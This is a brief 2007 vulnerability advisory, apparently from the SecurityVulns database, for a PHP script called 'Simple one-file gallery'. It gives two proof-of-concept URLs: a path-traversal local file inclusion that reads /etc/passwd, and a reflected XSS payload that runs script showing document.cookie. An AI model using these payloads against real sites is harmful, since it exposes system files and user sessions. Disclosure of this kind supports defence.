Simple one-file gallery

2007-02-25T00:00:00
ID SECURITYVULNS:DOC:16178
Type securityvulns
Reporter Securityvulns
Modified 2007-02-25T00:00:00

Description

local file include: /gallery.php?f=../../../../../../../../../../../../etc/passwd

xss via php error : /gallery.php?f=</textarea>'"><script>alert(document.cookie)</script>

regards laurent gaffie